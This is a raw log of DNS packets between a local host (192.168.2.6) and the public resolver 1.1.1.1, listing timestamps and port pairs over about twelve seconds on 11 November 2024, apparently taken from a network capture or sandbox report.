Nov 11, 2024 18:13:48.719968081 CET	62173	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.720318079 CET	55548	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.728971004 CET	53	55119	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.730333090 CET	53	58096	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.731121063 CET	53	62173	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.731971025 CET	59050	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.741305113 CET	53	59050	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.753896952 CET	53	55548	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.763838053 CET	59049	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.764014959 CET	58610	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.764663935 CET	59866	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.764872074 CET	63001	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.774072886 CET	53	59049	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.774107933 CET	53	63001	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.774282932 CET	53	59866	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.786791086 CET	53292	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.795964956 CET	53	58610	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.798640966 CET	53	53292	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:49.411056995 CET	57597	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:49.431617975 CET	53	57597	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:49.769731998 CET	63287	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:49.774771929 CET	51869	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:49.775136948 CET	56439	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:49.775300026 CET	53360	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:49.782398939 CET	53	51869	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:49.785259008 CET	53	53360	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:49.803329945 CET	53	63287	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:49.936419964 CET	63329	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:49.951603889 CET	50974	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:49.966869116 CET	53	63329	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:49.982393026 CET	63843	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:49.982424021 CET	59875	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:49.982752085 CET	53	50974	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:49.983995914 CET	54383	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:49.991497993 CET	53	59875	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:49.991852999 CET	53	63843	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:49.996423006 CET	53	54383	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:50.019263983 CET	53	56439	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:51.833988905 CET	53117	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:51.836183071 CET	63540	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:51.847378016 CET	53	63540	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:51.866331100 CET	53	53117	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:51.875200987 CET	55996	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:51.880610943 CET	62324	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:51.884264946 CET	58563	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:51.886094093 CET	53	55996	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:51.894658089 CET	53	58563	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:51.899857998 CET	53	62324	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:51.954066992 CET	55216	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:51.986171961 CET	53	55216	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.005012035 CET	52530	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.005918026 CET	64864	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.011594057 CET	64939	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.017384052 CET	53	52530	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.025146961 CET	53	64939	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.037657022 CET	53	64864	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.709166050 CET	63143	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.716948986 CET	53	63143	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.850207090 CET	49477	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.858375072 CET	62869	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.858397961 CET	52688	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.858697891 CET	49765	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.858872890 CET	64947	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.859236956 CET	63637	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.859380007 CET	53	49477	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.865964890 CET	53	49765	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.867908001 CET	53	62869	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.868417978 CET	53	52688	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.869544029 CET	53	63637	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.870400906 CET	53	64947	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.879626036 CET	64181	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.881638050 CET	60037	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.881968975 CET	59190	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.882330894 CET	61329	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.884896994 CET	51884	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.885122061 CET	65257	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.885312080 CET	59501	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.885504007 CET	58601	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.885874987 CET	53258	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.888515949 CET	54233	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.888933897 CET	53	60037	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.890346050 CET	52892	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.890659094 CET	53	64181	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.895993948 CET	53	51884	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.896321058 CET	60091	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.896384954 CET	53	65257	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.896620989 CET	61135	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.898510933 CET	53	52892	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.899061918 CET	53	54233	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.905836105 CET	53	60091	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.905889988 CET	53	53258	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.906374931 CET	53	61135	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.911928892 CET	53	59190	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.914098978 CET	53	61329	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.916004896 CET	53	59501	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.917193890 CET	53	58601	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.935523033 CET	55439	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.935756922 CET	51687	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.935842991 CET	53936	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.936016083 CET	51361	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.936288118 CET	65017	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.936554909 CET	63114	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.936749935 CET	63220	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.942032099 CET	63017	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.942205906 CET	58461	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.942363024 CET	64063	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.942570925 CET	53483	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.943293095 CET	63248	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.945167065 CET	53	51687	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.945647001 CET	53	53936	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.945679903 CET	53	65017	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.946938038 CET	53	63220	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.947467089 CET	53	51361	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.950253963 CET	58881	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.950419903 CET	65428	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.950577974 CET	64362	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.950715065 CET	62254	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.950856924 CET	49599	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.950985909 CET	52939	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.951160908 CET	51749	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.951176882 CET	60303	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.951354980 CET	49157	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.951386929 CET	57374	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.951765060 CET	53	63017	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.952075958 CET	53	64063	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.952882051 CET	53	53483	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.954593897 CET	53	63248	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.958671093 CET	57648	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.958925009 CET	64697	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.959069967 CET	59155	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.959285975 CET	64480	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.959541082 CET	53341	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.959721088 CET	51670	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.959788084 CET	53	58881	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.959940910 CET	53138	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.959996939 CET	53	65428	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.960211039 CET	57877	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.960274935 CET	53	62254	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.960375071 CET	53	52939	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.960433960 CET	51465	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.960741997 CET	64627	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.961076021 CET	53	64362	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.961184025 CET	53	51749	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.961554050 CET	53	60303	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.961879969 CET	53	57374	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.961941004 CET	53	49599	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.963376999 CET	64931	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.965635061 CET	56995	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.965799093 CET	57335	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.966116905 CET	64919	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:52.966559887 CET	53	55439	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.966929913 CET	53	59155	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.967339039 CET	53	64697	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.967721939 CET	53	63114	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.968803883 CET	53	57648	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.969651937 CET	53	64627	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.969665051 CET	53	64480	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.969907999 CET	53	53138	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.970628023 CET	53	51465	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.975148916 CET	53	58461	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.977672100 CET	53	57877	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.978194952 CET	53	53341	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.982974052 CET	53	49157	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.991569996 CET	53	51670	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.994339943 CET	53	64931	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.997239113 CET	53	56995	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.997421026 CET	53	57335	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:52.997432947 CET	53	64919	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:53.097714901 CET	60763	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:53.098074913 CET	62310	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:53.098351002 CET	63432	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:53.107778072 CET	53	62310	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:53.107858896 CET	53	60763	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:53.108472109 CET	53	63432	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:53.291706085 CET	60027	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:53.292710066 CET	60610	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:53.300456047 CET	53	60027	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:53.311403990 CET	53	60610	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:53.614945889 CET	65390	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:53.625154018 CET	53	65390	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:53.930306911 CET	51628	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:53.938108921 CET	53	51628	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:53.959090948 CET	65137	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:53.959578991 CET	58742	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:53.970030069 CET	53	65137	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:53.971400023 CET	53	58742	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:53.974843025 CET	51058	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:53.985018969 CET	53	51058	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:54.018883944 CET	64498	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:54.051789045 CET	53	64498	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:54.202828884 CET	53790	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:54.203274012 CET	49207	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:54.213593006 CET	53	53790	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:54.240782022 CET	53	49207	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:54.349356890 CET	50401	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:54.360255957 CET	53	50401	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:54.703922033 CET	62435	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:54.715008974 CET	53	62435	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:54.725263119 CET	58069	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:54.726016998 CET	62999	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:54.726358891 CET	64594	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:54.726466894 CET	50088	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:54.735668898 CET	53	50088	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:54.736125946 CET	53	62999	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:54.737046957 CET	53	58069	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:54.744385958 CET	53	64594	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.263694048 CET	52334	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.284812927 CET	53	52334	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.302767992 CET	63569	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.313999891 CET	62910	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.324140072 CET	53	62910	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.334692001 CET	53	63569	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.363590002 CET	62199	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.394396067 CET	53	62199	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.416745901 CET	59643	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.427841902 CET	53	59643	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.646405935 CET	57070	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.660568953 CET	53674	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.661365032 CET	57384	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.677850962 CET	53	57070	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.690542936 CET	53125	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.692240000 CET	53	57384	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.700767994 CET	53	53125	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.764096975 CET	53	53674	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.787370920 CET	59235	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.799170017 CET	53	59235	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.857578993 CET	52974	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.857990026 CET	52625	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.858131886 CET	64329	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.858974934 CET	64800	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.867690086 CET	53	52625	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.869798899 CET	53	52974	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.869810104 CET	53	64800	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.891257048 CET	53	64329	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:55.959685087 CET	50141	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:55.979196072 CET	53	50141	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:56.049329996 CET	56577	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:56.082597971 CET	53	56577	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:56.336786032 CET	50305	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:56.411204100 CET	63704	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:56.513763905 CET	53	50305	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:56.513973951 CET	53	63704	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:56.592657089 CET	55691	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:56.592657089 CET	51425	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:56.592959881 CET	62543	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:56.593172073 CET	51738	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:56.593512058 CET	61937	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:56.602711916 CET	53	62543	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:56.603534937 CET	53	51738	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:56.606142998 CET	53	55691	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:56.610861063 CET	53	51425	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:56.624365091 CET	53	61937	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:57.387499094 CET	59910	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:57.421608925 CET	53	59910	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:57.484194994 CET	56032	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:57.485918999 CET	50281	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:57.497273922 CET	53	56032	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:57.498490095 CET	53	50281	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:57.507083893 CET	53587	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:57.507764101 CET	51801	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:57.539623022 CET	53	53587	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:57.542666912 CET	53	51801	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:57.653889894 CET	64897	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:57.665183067 CET	53	64897	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:57.725497961 CET	55100	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:57.734788895 CET	53	55100	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:57.807223082 CET	58043	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:57.816397905 CET	53	58043	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:57.993000984 CET	64820	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:58.003222942 CET	53	64820	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:59.624464035 CET	60956	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:59.634140015 CET	53	60956	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.106010914 CET	54896	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.109219074 CET	52510	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.110028028 CET	54792	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.116528988 CET	53	54896	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.119180918 CET	53	52510	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.120084047 CET	53	54792	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.131160975 CET	54801	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.134798050 CET	56465	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.135440111 CET	56338	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.138149977 CET	55533	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.139301062 CET	52856	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.141604900 CET	53	54801	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.143626928 CET	61845	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.145627022 CET	53	56338	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.145698071 CET	53	56465	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.147700071 CET	53	55533	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.149887085 CET	64748	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.150072098 CET	59448	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.151182890 CET	61050	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.152496099 CET	64945	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.152973890 CET	57520	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.153093100 CET	65467	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.153410912 CET	53	61845	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.155137062 CET	51880	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.160217047 CET	53	59448	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.161194086 CET	53	61050	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.162693977 CET	53	57520	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.162900925 CET	53	65467	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.163479090 CET	53	64945	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.165862083 CET	53	51880	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.170581102 CET	53	52856	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.174163103 CET	50661	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.175407887 CET	52109	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.177094936 CET	52984	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.177282095 CET	57533	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.177483082 CET	55932	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.177743912 CET	61854	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.177947998 CET	58707	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.178205967 CET	65223	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.178456068 CET	54554	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.178615093 CET	53244	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.181922913 CET	53	64748	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.181927919 CET	62139	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.184690952 CET	51087	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.184729099 CET	53	57533	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.185148001 CET	60209	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.185348034 CET	55203	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.185650110 CET	53	50661	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.185745001 CET	59630	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.186264038 CET	53	52109	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.186786890 CET	53	55932	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.186817884 CET	53	52984	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.187144041 CET	53900	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.187325001 CET	53	54554	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.187525988 CET	51964	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.187737942 CET	59777	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.187999010 CET	53277	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.188519955 CET	65300	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.188908100 CET	53	61854	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.189980984 CET	53	53244	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.190995932 CET	49808	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.192178011 CET	57875	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.192447901 CET	51524	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.192769051 CET	64094	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.193283081 CET	57100	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.193392038 CET	53	62139	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.195069075 CET	53	55203	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.195225000 CET	53	60209	1.1.1.1	192.168.2.6
